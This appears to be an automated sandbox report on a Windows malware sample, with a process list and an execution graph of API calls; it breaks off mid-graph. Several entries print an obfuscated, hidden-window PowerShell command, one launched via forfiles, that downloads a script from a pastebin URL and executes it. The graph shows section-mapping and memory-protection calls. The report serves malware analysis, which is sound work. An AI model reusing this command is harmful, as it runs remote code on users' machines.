                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:12
                                                                      Start time:09:59:50
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                      Imagebase:0x7ff788560000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:13
                                                                      Start time:09:59:57
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\forfiles.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                      Imagebase:0x7ff7729f0000
                                                                      File size:52'224 bytes
                                                                      MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Target ID:14
                                                                      Start time:09:59:57
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Target ID:15
                                                                      Start time:09:59:57
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                      Imagebase:0x7ff788560000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Target ID:16
                                                                      Start time:09:59:57
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                      Imagebase:0x7ff788560000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:3.3%
                                                                        Dynamic/Decrypted Code Coverage:14.7%
                                                                        Signature Coverage:13.7%
                                                                        Total number of Nodes:497
                                                                        Total number of Limit Nodes:30
                                                                        execution_graph 18704 22af4e5221c 18705 22af4e52235 __scrt_is_managed_app __scrt_initialize_crt __scrt_release_startup_lock 18704->18705 18705->18704 18707 22af4e52280 18705->18707 18708 22af4e51360 18705->18708 18709 22af4e5139e 18708->18709 18710 22af4e51435 WinExec 18709->18710 18711 22af4e51448 18710->18711 18712 7ff663546130 18714 7ff663546164 18712->18714 18725 7ff6635462ac messages BuildCatchObjectHelperInternal 18712->18725 18713 7ff66354635e 18746 7ff663546370 18713->18746 18714->18713 18717 7ff6635461bb 18714->18717 18718 7ff663546207 18714->18718 18714->18725 18720 7ff663546358 18717->18720 18726 7ff663548db8 18717->18726 18722 7ff663548db8 std::_Facet_Register 49 API calls 18718->18722 18724 7ff6635461ca BuildCatchObjectHelperInternal 18718->18724 18740 7ff6635412b0 18720->18740 18722->18724 18724->18725 18735 7ff663552044 18724->18735 18730 7ff663548dc3 18726->18730 18727 7ff663548ddc 18727->18724 18729 7ff663548de2 18731 7ff663548ded 18729->18731 18752 7ff663546668 18729->18752 18730->18727 18730->18729 18749 7ff663555484 18730->18749 18733 7ff6635412b0 Concurrency::cancel_current_task 49 API calls 18731->18733 18734 7ff663548df3 messages 18733->18734 18734->18724 18767 7ff663551ebc 18735->18767 18741 7ff6635412be Concurrency::cancel_current_task 18740->18741 18742 7ff66354ab1c Concurrency::cancel_current_task 2 API calls 18741->18742 18743 7ff6635412cf 18742->18743 18967 7ff66354a8d8 18743->18967 18745 7ff6635412f9 18745->18713 18980 7ff663546688 18746->18980 18756 7ff6635554c4 18749->18756 18753 7ff663546676 std::bad_alloc::bad_alloc 18752->18753 18762 7ff66354ab1c 18753->18762 18755 7ff663546687 18761 7ff663552104 EnterCriticalSection 18756->18761 18758 7ff6635554d1 18759 7ff663552158 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 18758->18759 18760 7ff663555496 18759->18760 18760->18730 18763 7ff66354ab3b 18762->18763 18764 7ff66354ab86 RaiseException 18763->18764 18765 7ff66354ab64 RtlPcToFileHeader 18763->18765 18764->18755 18766 7ff66354ab7c 18765->18766 18766->18764 18768 7ff663551ee7 18767->18768 18779 7ff663551f58 18768->18779 18770 7ff663551f0e 18772 7ff663551f31 18770->18772 18789 7ff6635509d0 18770->18789 18773 7ff663551f46 18772->18773 18774 7ff6635509d0 ProcessCodePage 47 API calls 18772->18774 18775 7ff663552074 IsProcessorFeaturePresent 18773->18775 18774->18773 18776 7ff663552087 18775->18776 18777 7ff663551d58 _invalid_parameter_noinfo_noreturn 14 API calls 18776->18777 18778 7ff6635520a2 GetCurrentProcess TerminateProcess 18777->18778 18798 7ff663551ca0 18779->18798 18783 7ff663551f93 18783->18770 18785 7ff663552074 _invalid_parameter_noinfo_noreturn 17 API calls 18786 7ff663552023 18785->18786 18787 7ff663551ebc _invalid_parameter_noinfo_noreturn 47 API calls 18786->18787 18788 7ff66355203d 18787->18788 18788->18770 18790 7ff663550a28 18789->18790 18791 7ff6635509df GetLastError 18789->18791 18790->18772 18792 7ff6635509f4 18791->18792 18793 7ff66355a4d8 ProcessCodePage 16 API calls 18792->18793 18794 7ff663550a0e SetLastError 18793->18794 18794->18790 18795 7ff663550a31 18794->18795 18876 7ff663554e4c 18795->18876 18799 7ff663551cbc GetLastError 18798->18799 18800 7ff663551cf7 18798->18800 18801 7ff663551ccc 18799->18801 18800->18783 18804 7ff663551d0c 18800->18804 18807 7ff66355a4d8 18801->18807 18805 7ff663551d28 GetLastError SetLastError 18804->18805 18806 7ff663551d40 18804->18806 18805->18806 18806->18783 18806->18785 18808 7ff66355a4f7 FlsGetValue 18807->18808 18809 7ff66355a512 FlsSetValue 18807->18809 18810 7ff66355a50c 18808->18810 18812 7ff663551ce7 SetLastError 18808->18812 18811 7ff66355a51f 18809->18811 18809->18812 18810->18809 18824 7ff663558a7c 18811->18824 18812->18800 18814 7ff66355a52e 18815 7ff66355a54c FlsSetValue 18814->18815 18816 7ff66355a53c FlsSetValue 18814->18816 18818 7ff66355a56a 18815->18818 18819 7ff66355a558 FlsSetValue 18815->18819 18817 7ff66355a545 18816->18817 18831 7ff663558af4 18817->18831 18837 7ff66355a048 18818->18837 18819->18817 18829 7ff663558a8d _set_fmode 18824->18829 18825 7ff663558ade 18842 7ff663554848 18825->18842 18826 7ff663558ac2 HeapAlloc 18827 7ff663558adc 18826->18827 18826->18829 18827->18814 18829->18825 18829->18826 18830 7ff663555484 std::_Facet_Register 2 API calls 18829->18830 18830->18829 18832 7ff663558af9 HeapFree 18831->18832 18833 7ff663558b28 18831->18833 18832->18833 18834 7ff663558b14 GetLastError 18832->18834 18833->18812 18835 7ff663558b21 __free_lconv_num 18834->18835 18836 7ff663554848 _set_fmode 9 API calls 18835->18836 18836->18833 18862 7ff663559f20 18837->18862 18845 7ff66355a410 GetLastError 18842->18845 18844 7ff663554851 18844->18827 18846 7ff66355a451 FlsSetValue 18845->18846 18850 7ff66355a434 18845->18850 18847 7ff66355a463 18846->18847 18851 7ff66355a441 18846->18851 18849 7ff663558a7c _set_fmode 5 API calls 18847->18849 18848 7ff66355a4bd SetLastError 18848->18844 18852 7ff66355a472 18849->18852 18850->18846 18850->18851 18851->18848 18853 7ff66355a490 FlsSetValue 18852->18853 18854 7ff66355a480 FlsSetValue 18852->18854 18856 7ff66355a49c FlsSetValue 18853->18856 18857 7ff66355a4ae 18853->18857 18855 7ff66355a489 18854->18855 18859 7ff663558af4 __free_lconv_num 5 API calls 18855->18859 18856->18855 18858 7ff66355a048 _set_fmode 5 API calls 18857->18858 18860 7ff66355a4b6 18858->18860 18859->18851 18861 7ff663558af4 __free_lconv_num 5 API calls 18860->18861 18861->18848 18874 7ff663552104 EnterCriticalSection 18862->18874 18885 7ff66355f8d8 18876->18885 18919 7ff66355f890 18885->18919 18924 7ff663552104 EnterCriticalSection 18919->18924 18968 7ff66354a8f9 18967->18968 18969 7ff66354a92e __std_exception_copy 18967->18969 18968->18969 18971 7ff663551b00 18968->18971 18969->18745 18972 7ff663551b0d 18971->18972 18973 7ff663551b17 18971->18973 18972->18973 18978 7ff663551b32 18972->18978 18974 7ff663554848 _set_fmode 11 API calls 18973->18974 18975 7ff663551b1e 18974->18975 18976 7ff663552024 _invalid_parameter_noinfo 47 API calls 18975->18976 18977 7ff663551b2a 18976->18977 18977->18969 18978->18977 18979 7ff663554848 _set_fmode 11 API calls 18978->18979 18979->18975 18985 7ff663546518 18980->18985 18983 7ff66354ab1c Concurrency::cancel_current_task 2 API calls 18984 7ff6635466aa 18983->18984 18986 7ff66354a8d8 __std_exception_copy 47 API calls 18985->18986 18987 7ff66354654c 18986->18987 18987->18983 18988 7ff663548f04 19009 7ff6635490d0 18988->19009 18991 7ff66354905b 19074 7ff66354998c IsProcessorFeaturePresent 18991->19074 18992 7ff663548f25 __scrt_acquire_startup_lock 18994 7ff663549065 18992->18994 19001 7ff663548f43 __scrt_release_startup_lock 18992->19001 18995 7ff66354998c 7 API calls 18994->18995 18997 7ff663549070 BuildCatchObjectHelperInternal 18995->18997 18996 7ff663548f68 18998 7ff663548fee 19017 7ff663555e2c 18998->19017 19000 7ff663548ff3 19023 7ff663542230 19000->19023 19001->18996 19001->18998 19063 7ff6635561d8 19001->19063 19006 7ff663549017 19006->18997 19070 7ff663549254 19006->19070 19010 7ff6635490d8 19009->19010 19011 7ff6635490e4 __scrt_dllmain_crt_thread_attach 19010->19011 19012 7ff663548f1d 19011->19012 19013 7ff6635490f1 19011->19013 19012->18991 19012->18992 19081 7ff6635580fc 19013->19081 19018 7ff663555e3c 19017->19018 19022 7ff663555e51 19017->19022 19018->19022 19124 7ff663555acc 19018->19124 19022->19000 19024 7ff663542285 19023->19024 19416 7ff663544a50 19024->19416 19026 7ff663542328 19027 7ff663543b80 49 API calls 19026->19027 19028 7ff663542343 19027->19028 19029 7ff663543b80 49 API calls 19028->19029 19030 7ff663542390 19029->19030 19031 7ff663543b80 49 API calls 19030->19031 19036 7ff6635423dd messages 19031->19036 19032 7ff6635424e6 SleepEx 19033 7ff66354251e 19032->19033 19039 7ff66354252c VirtualAlloc 19033->19039 19048 7ff663542571 messages 19033->19048 19034 7ff663552044 _invalid_parameter_noinfo_noreturn 47 API calls 19035 7ff66354275b 19034->19035 19037 7ff663552044 _invalid_parameter_noinfo_noreturn 47 API calls 19035->19037 19036->19032 19036->19035 19038 7ff663542761 19036->19038 19062 7ff663542755 19036->19062 19037->19038 19040 7ff663552044 _invalid_parameter_noinfo_noreturn 47 API calls 19038->19040 19041 7ff66354254e BuildCatchObjectHelperInternal 19039->19041 19039->19048 19042 7ff663542767 19040->19042 19045 7ff66354255e VirtualFree 19041->19045 19043 7ff663552044 _invalid_parameter_noinfo_noreturn 47 API calls 19042->19043 19044 7ff66354276d 19043->19044 19046 7ff663552044 _invalid_parameter_noinfo_noreturn 47 API calls 19044->19046 19045->19048 19047 7ff663542773 19046->19047 19049 7ff663552044 _invalid_parameter_noinfo_noreturn 47 API calls 19047->19049 19048->19042 19048->19044 19048->19047 19050 7ff663542779 19048->19050 19051 7ff66354277f 19048->19051 19055 7ff66354271f messages 19048->19055 19058 7ff663542785 19048->19058 19059 7ff663542750 19048->19059 19049->19050 19052 7ff663552044 _invalid_parameter_noinfo_noreturn 47 API calls 19050->19052 19054 7ff663552044 _invalid_parameter_noinfo_noreturn 47 API calls 19051->19054 19052->19051 19053 7ff663548d90 _invalid_parameter_noinfo_noreturn 8 API calls 19057 7ff663542733 19053->19057 19054->19058 19055->19053 19056 7ff663552044 _invalid_parameter_noinfo_noreturn 47 API calls 19060 7ff66354278b 19056->19060 19068 7ff663549adc GetModuleHandleW 19057->19068 19058->19056 19061 7ff663552044 _invalid_parameter_noinfo_noreturn 47 API calls 19059->19061 19061->19062 19062->19034 19064 7ff6635561ef 19063->19064 19065 7ff663556210 19063->19065 19064->18998 19425 7ff663558148 19065->19425 19069 7ff663549aed 19068->19069 19069->19006 19071 7ff663549265 19070->19071 19072 7ff66354902e 19071->19072 19073 7ff66354ae30 7 API calls 19071->19073 19072->18996 19073->19072 19075 7ff6635499b2 memcpy_s _invalid_parameter_noinfo_noreturn 19074->19075 19076 7ff6635499d1 RtlCaptureContext RtlLookupFunctionEntry 19075->19076 19077 7ff6635499fa RtlVirtualUnwind 19076->19077 19078 7ff663549a36 memcpy_s 19076->19078 19077->19078 19079 7ff663549a68 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19078->19079 19080 7ff663549ab6 _invalid_parameter_noinfo_noreturn 19079->19080 19080->18994 19082 7ff663564864 19081->19082 19083 7ff6635490f6 19082->19083 19091 7ff66355a7f0 19082->19091 19083->19012 19085 7ff66354ae30 19083->19085 19086 7ff66354ae38 19085->19086 19087 7ff66354ae42 19085->19087 19103 7ff66354b008 19086->19103 19087->19012 19102 7ff663552104 EnterCriticalSection 19091->19102 19093 7ff66355a800 19094 7ff663561ce8 53 API calls 19093->19094 19095 7ff66355a809 19094->19095 19096 7ff66355a817 19095->19096 19097 7ff66355a5f8 55 API calls 19095->19097 19098 7ff663552158 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 19096->19098 19099 7ff66355a812 19097->19099 19100 7ff66355a823 19098->19100 19101 7ff66355a6e8 GetStdHandle GetFileType 19099->19101 19100->19082 19101->19096 19104 7ff66354b017 19103->19104 19105 7ff66354ae3d 19103->19105 19111 7ff66354e424 19104->19111 19107 7ff66354e254 19105->19107 19108 7ff66354e27f 19107->19108 19109 7ff66354e262 DeleteCriticalSection 19108->19109 19110 7ff66354e283 19108->19110 19109->19108 19110->19087 19115 7ff66354e28c 19111->19115 19116 7ff66354e376 TlsFree 19115->19116 19122 7ff66354e2d0 __vcrt_InitializeCriticalSectionEx 19115->19122 19117 7ff66354e2fe LoadLibraryExW 19119 7ff66354e39d 19117->19119 19120 7ff66354e31f GetLastError 19117->19120 19118 7ff66354e3bd GetProcAddress 19118->19116 19119->19118 19121 7ff66354e3b4 FreeLibrary 19119->19121 19120->19122 19121->19118 19122->19116 19122->19117 19122->19118 19123 7ff66354e341 LoadLibraryExW 19122->19123 19123->19119 19123->19122 19125 7ff663555ae5 19124->19125 19138 7ff663555ae1 19124->19138 19147 7ff663561270 19125->19147 19130 7ff663555af7 19132 7ff663558af4 __free_lconv_num 11 API calls 19130->19132 19131 7ff663555b03 19173 7ff663555b40 19131->19173 19132->19138 19135 7ff663558af4 __free_lconv_num 11 API calls 19136 7ff663555b2a 19135->19136 19137 7ff663558af4 __free_lconv_num 11 API calls 19136->19137 19137->19138 19138->19022 19139 7ff663555c94 19138->19139 19140 7ff663555cbd 19139->19140 19145 7ff663555cd6 19139->19145 19140->19022 19141 7ff663558a7c _set_fmode 11 API calls 19141->19145 19142 7ff663555d66 19144 7ff663558af4 __free_lconv_num 11 API calls 19142->19144 19143 7ff66355fc34 WideCharToMultiByte std::_Locinfo::_Locinfo_ctor 19143->19145 19144->19140 19145->19140 19145->19141 19145->19142 19145->19143 19146 7ff663558af4 __free_lconv_num 11 API calls 19145->19146 19146->19145 19148 7ff66356127d 19147->19148 19149 7ff663555aea 19147->19149 19192 7ff66355a36c 19148->19192 19153 7ff663561634 GetEnvironmentStringsW 19149->19153 19154 7ff663555aef 19153->19154 19155 7ff663561664 19153->19155 19154->19130 19154->19131 19156 7ff66355fc34 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 19155->19156 19157 7ff6635616b5 19156->19157 19158 7ff6635616bc FreeEnvironmentStringsW 19157->19158 19159 7ff663558b30 std::_Locinfo::_Locinfo_ctor 12 API calls 19157->19159 19158->19154 19160 7ff6635616cf 19159->19160 19161 7ff6635616d7 19160->19161 19162 7ff6635616e0 19160->19162 19163 7ff663558af4 __free_lconv_num 11 API calls 19161->19163 19164 7ff66355fc34 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 19162->19164 19165 7ff6635616de 19163->19165 19166 7ff663561703 19164->19166 19165->19158 19167 7ff663561707 19166->19167 19168 7ff663561711 19166->19168 19169 7ff663558af4 __free_lconv_num 11 API calls 19167->19169 19170 7ff663558af4 __free_lconv_num 11 API calls 19168->19170 19171 7ff66356170f FreeEnvironmentStringsW 19169->19171 19170->19171 19171->19154 19174 7ff663555b65 19173->19174 19175 7ff663558a7c _set_fmode 11 API calls 19174->19175 19188 7ff663555b9b 19175->19188 19176 7ff663555ba3 19177 7ff663558af4 __free_lconv_num 11 API calls 19176->19177 19179 7ff663555b0b 19177->19179 19178 7ff663555c16 19180 7ff663558af4 __free_lconv_num 11 API calls 19178->19180 19179->19135 19180->19179 19181 7ff663558a7c _set_fmode 11 API calls 19181->19188 19182 7ff663555c05 19410 7ff663555c50 19182->19410 19183 7ff663551b00 __std_exception_copy 47 API calls 19183->19188 19186 7ff663558af4 __free_lconv_num 11 API calls 19186->19176 19187 7ff663555c3b 19189 7ff663552074 _invalid_parameter_noinfo_noreturn 17 API calls 19187->19189 19188->19176 19188->19178 19188->19181 19188->19182 19188->19183 19188->19187 19190 7ff663558af4 __free_lconv_num 11 API calls 19188->19190 19191 7ff663555c4e 19189->19191 19190->19188 19193 7ff66355a37d FlsGetValue 19192->19193 19194 7ff66355a398 FlsSetValue 19192->19194 19195 7ff66355a38a 19193->19195 19196 7ff66355a392 19193->19196 19194->19195 19197 7ff66355a3a5 19194->19197 19198 7ff66355a390 19195->19198 19199 7ff663554e4c BuildCatchObjectHelperInternal 47 API calls 19195->19199 19196->19194 19200 7ff663558a7c _set_fmode 11 API calls 19197->19200 19212 7ff663560f48 19198->19212 19202 7ff66355a40d 19199->19202 19201 7ff66355a3b4 19200->19201 19203 7ff66355a3d2 FlsSetValue 19201->19203 19204 7ff66355a3c2 FlsSetValue 19201->19204 19206 7ff66355a3de FlsSetValue 19203->19206 19207 7ff66355a3f0 19203->19207 19205 7ff66355a3cb 19204->19205 19208 7ff663558af4 __free_lconv_num 11 API calls 19205->19208 19206->19205 19209 7ff66355a048 _set_fmode 11 API calls 19207->19209 19208->19195 19210 7ff66355a3f8 19209->19210 19211 7ff663558af4 __free_lconv_num 11 API calls 19210->19211 19211->19198 19235 7ff6635611b8 19212->19235 19214 7ff663560f7d 19250 7ff663560c48 19214->19250 19219 7ff663560fb3 19220 7ff663558af4 __free_lconv_num 11 API calls 19219->19220 19232 7ff663560f9a 19220->19232 19221 7ff663560fc2 19221->19221 19264 7ff6635612ec 19221->19264 19224 7ff6635610be 19225 7ff663554848 _set_fmode 11 API calls 19224->19225 19226 7ff6635610c3 19225->19226 19228 7ff663558af4 __free_lconv_num 11 API calls 19226->19228 19227 7ff663561119 19230 7ff663561180 19227->19230 19275 7ff663560a78 19227->19275 19228->19232 19229 7ff6635610d8 19229->19227 19233 7ff663558af4 __free_lconv_num 11 API calls 19229->19233 19231 7ff663558af4 __free_lconv_num 11 API calls 19230->19231 19231->19232 19232->19149 19233->19227 19236 7ff6635611db 19235->19236 19237 7ff6635611e5 19236->19237 19290 7ff663552104 EnterCriticalSection 19236->19290 19239 7ff663561257 19237->19239 19242 7ff663554e4c BuildCatchObjectHelperInternal 47 API calls 19237->19242 19239->19214 19243 7ff66356126f 19242->19243 19245 7ff6635612c2 19243->19245 19247 7ff66355a36c 52 API calls 19243->19247 19245->19214 19248 7ff6635612ac 19247->19248 19249 7ff663560f48 67 API calls 19248->19249 19249->19245 19291 7ff663554868 19250->19291 19253 7ff663560c7a 19255 7ff663560c8f 19253->19255 19256 7ff663560c7f GetACP 19253->19256 19254 7ff663560c68 GetOEMCP 19254->19255 19255->19232 19257 7ff663558b30 19255->19257 19256->19255 19258 7ff663558b7b 19257->19258 19262 7ff663558b3f _set_fmode 19257->19262 19260 7ff663554848 _set_fmode 11 API calls 19258->19260 19259 7ff663558b62 HeapAlloc 19261 7ff663558b79 19259->19261 19259->19262 19260->19261 19261->19219 19261->19221 19262->19258 19262->19259 19263 7ff663555484 std::_Facet_Register 2 API calls 19262->19263 19263->19262 19265 7ff663560c48 49 API calls 19264->19265 19266 7ff663561319 19265->19266 19267 7ff663561356 IsValidCodePage 19266->19267 19273 7ff66356146f 19266->19273 19274 7ff663561370 memcpy_s 19266->19274 19269 7ff663561367 19267->19269 19267->19273 19268 7ff663548d90 _invalid_parameter_noinfo_noreturn 8 API calls 19270 7ff6635610b5 19268->19270 19271 7ff663561396 GetCPInfo 19269->19271 19269->19274 19270->19224 19270->19229 19271->19273 19271->19274 19273->19268 19323 7ff663560d60 19274->19323 19409 7ff663552104 EnterCriticalSection 19275->19409 19292 7ff66355488c 19291->19292 19293 7ff663554887 19291->19293 19292->19293 19294 7ff66355a298 _Getctype 47 API calls 19292->19294 19293->19253 19293->19254 19295 7ff6635548a7 19294->19295 19299 7ff663558b90 19295->19299 19300 7ff6635548ca 19299->19300 19301 7ff663558ba5 19299->19301 19303 7ff663558bfc 19300->19303 19301->19300 19307 7ff663563264 19301->19307 19304 7ff663558c24 19303->19304 19305 7ff663558c11 19303->19305 19304->19293 19305->19304 19320 7ff6635612d0 19305->19320 19308 7ff66355a298 _Getctype 47 API calls 19307->19308 19309 7ff663563273 19308->19309 19310 7ff6635632be 19309->19310 19319 7ff663552104 EnterCriticalSection 19309->19319 19310->19300 19321 7ff66355a298 _Getctype 47 API calls 19320->19321 19322 7ff6635612d9 19321->19322 19324 7ff663560d9d GetCPInfo 19323->19324 19333 7ff663560e93 19323->19333 19330 7ff663560db0 19324->19330 19324->19333 19325 7ff663548d90 _invalid_parameter_noinfo_noreturn 8 API calls 19327 7ff663560f32 19325->19327 19327->19273 19334 7ff66355f1d0 19330->19334 19333->19325 19335 7ff663554868 TranslateName 47 API calls 19334->19335 19336 7ff66355f212 19335->19336 19354 7ff66355fba4 19336->19354 19356 7ff66355fbad MultiByteToWideChar 19354->19356 19411 7ff663555c55 19410->19411 19412 7ff663555c0d 19410->19412 19413 7ff663555c7e 19411->19413 19415 7ff663558af4 __free_lconv_num 11 API calls 19411->19415 19412->19186 19414 7ff663558af4 __free_lconv_num 11 API calls 19413->19414 19414->19412 19415->19411 19417 7ff663544ba1 19416->19417 19420 7ff663541350 19417->19420 19421 7ff663546688 49 API calls 19420->19421 19422 7ff663541360 19421->19422 19423 7ff66354a8d8 __std_exception_copy 47 API calls 19422->19423 19424 7ff663541399 19423->19424 19426 7ff66355a298 _Getctype 47 API calls 19425->19426 19427 7ff663558151 19426->19427 19428 7ff663554e4c BuildCatchObjectHelperInternal 47 API calls 19427->19428 19429 7ff663558171 19428->19429 19430 7ff663558b30 19431 7ff663558b7b 19430->19431 19435 7ff663558b3f _set_fmode 19430->19435 19433 7ff663554848 _set_fmode 11 API calls 19431->19433 19432 7ff663558b62 HeapAlloc 19434 7ff663558b79 19432->19434 19432->19435 19433->19434 19435->19431 19435->19432 19436 7ff663555484 std::_Facet_Register 2 API calls 19435->19436 19436->19435 19437 22af4e179f8 VirtualAlloc 19438 22af4e17a10 19437->19438 19439 22af4e17a3c 19437->19439 19439->19438 19451 22af4e1943b 19439->19451 19441 22af4e1943b LoadLibraryA 19443 22af4e17b07 19441->19443 19442 22af4e17ab0 19442->19438 19442->19443 19480 22af4e191ab 19442->19480 19443->19438 19443->19441 19445 22af4e17b47 19443->19445 19445->19438 19450 22af4e17bbe 19445->19450 19484 22af4e168fb 19445->19484 19447 22af4e17ba5 19447->19438 19491 22af4e16a27 19447->19491 19450->19438 19455 22af4e1819f 19450->19455 19454 22af4e19472 19451->19454 19452 22af4e19497 19452->19442 19454->19452 19496 22af4e16f47 19454->19496 19456 22af4e181f3 19455->19456 19457 22af4e1824b NtCreateSection 19456->19457 19459 22af4e1827a 19456->19459 19479 22af4e18a27 19456->19479 19457->19459 19457->19479 19458 22af4e18320 NtMapViewOfSection 19469 22af4e18374 19458->19469 19459->19458 19459->19479 19460 22af4e186ef VirtualAlloc 19467 22af4e187a6 19460->19467 19462 22af4e191ab LoadLibraryA 19464 22af4e18650 19462->19464 19463 22af4e191ab LoadLibraryA 19463->19469 19464->19460 19464->19462 19472 22af4e19293 LoadLibraryA 19464->19472 19465 22af4e188a2 VirtualProtect 19466 22af4e189b5 VirtualProtect 19465->19466 19476 22af4e188ca 19465->19476 19473 22af4e189f1 19466->19473 19467->19465 19468 22af4e1881e NtUnmapViewOfSection 19467->19468 19471 22af4e18836 NtMapViewOfSection 19468->19471 19468->19479 19469->19463 19469->19464 19470 22af4e19293 LoadLibraryA 19469->19470 19469->19479 19470->19469 19471->19465 19471->19479 19472->19464 19473->19479 19510 22af4e18f4f 19473->19510 19474 22af4e189a8 19474->19466 19476->19474 19478 22af4e1897b VirtualProtect 19476->19478 19478->19476 19479->19438 19481 22af4e191c9 19480->19481 19482 22af4e19274 LoadLibraryA 19481->19482 19483 22af4e1927c 19481->19483 19482->19483 19483->19442 19485 22af4e191ab LoadLibraryA 19484->19485 19486 22af4e1691a 19485->19486 19487 22af4e19293 LoadLibraryA 19486->19487 19490 22af4e16922 19486->19490 19488 22af4e16941 19487->19488 19489 22af4e19293 LoadLibraryA 19488->19489 19488->19490 19489->19490 19490->19447 19492 22af4e191ab LoadLibraryA 19491->19492 19493 22af4e16a45 19492->19493 19494 22af4e19293 LoadLibraryA 19493->19494 19495 22af4e16a5a 19494->19495 19495->19450 19497 22af4e1701e 19496->19497 19498 22af4e16f87 19496->19498 19497->19454 19498->19497 19500 22af4e170ff 19498->19500 19501 22af4e1716b 19500->19501 19505 22af4e17142 19500->19505 19502 22af4e191ab LoadLibraryA 19501->19502 19504 22af4e1717b 19501->19504 19502->19504 19504->19497 19505->19501 19505->19504 19506 22af4e19293 19505->19506 19507 22af4e19403 19506->19507 19508 22af4e192c9 19506->19508 19507->19505 19508->19507 19509 22af4e170ff LoadLibraryA 19508->19509 19509->19507 19513 22af4e18f8b 19510->19513 19511 22af4e19187 19511->19479 19512 22af4e19293 LoadLibraryA 19512->19513 19513->19511 19513->19512

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 7ff663542230-7ff663542413 call 7ff663544cf0 * 5 call 7ff663544a50 call 7ff663543b80 * 3 19 7ff663542447-7ff663542463 0->19 20 7ff663542415-7ff663542427 0->20 23 7ff663542497-7ff6635424b2 19->23 24 7ff663542465-7ff663542477 19->24 21 7ff663542429-7ff66354243c 20->21 22 7ff663542442 call 7ff663548db0 20->22 21->22 25 7ff663542756-7ff66354275b call 7ff663552044 21->25 22->19 29 7ff6635424e6-7ff66354252a SleepEx call 7ff663541f20 23->29 30 7ff6635424b4-7ff6635424c6 23->30 27 7ff663542479-7ff66354248c 24->27 28 7ff663542492 call 7ff663548db0 24->28 33 7ff66354275c-7ff663542761 call 7ff663552044 25->33 27->28 27->33 28->23 42 7ff66354252c-7ff66354254c VirtualAlloc 29->42 43 7ff663542571 29->43 35 7ff6635424c8-7ff6635424db 30->35 36 7ff6635424e1 call 7ff663548db0 30->36 40 7ff663542762-7ff663542767 call 7ff663552044 33->40 35->36 35->40 36->29 49 7ff663542768-7ff66354276d call 7ff663552044 40->49 42->43 46 7ff66354254e-7ff66354256f call 7ff6635695a0 VirtualFree 42->46 47 7ff663542577-7ff66354257a 43->47 46->47 51 7ff66354257c-7ff66354258d 47->51 52 7ff6635425b1-7ff6635425b9 47->52 65 7ff66354276e-7ff663542773 call 7ff663552044 49->65 57 7ff6635425a8-7ff6635425b0 call 7ff663548db0 51->57 58 7ff66354258f-7ff6635425a2 51->58 53 7ff6635425ec-7ff663542605 52->53 54 7ff6635425bb-7ff6635425cc 52->54 62 7ff663542639-7ff663542641 53->62 63 7ff663542607-7ff663542618 53->63 59 7ff6635425e7 call 7ff663548db0 54->59 60 7ff6635425ce-7ff6635425e1 54->60 57->52 58->49 58->57 59->53 60->59 60->65 70 7ff663542675-7ff66354267d 62->70 71 7ff663542643-7ff663542654 62->71 67 7ff66354261a-7ff66354262d 63->67 68 7ff663542633-7ff663542638 call 7ff663548db0 63->68 76 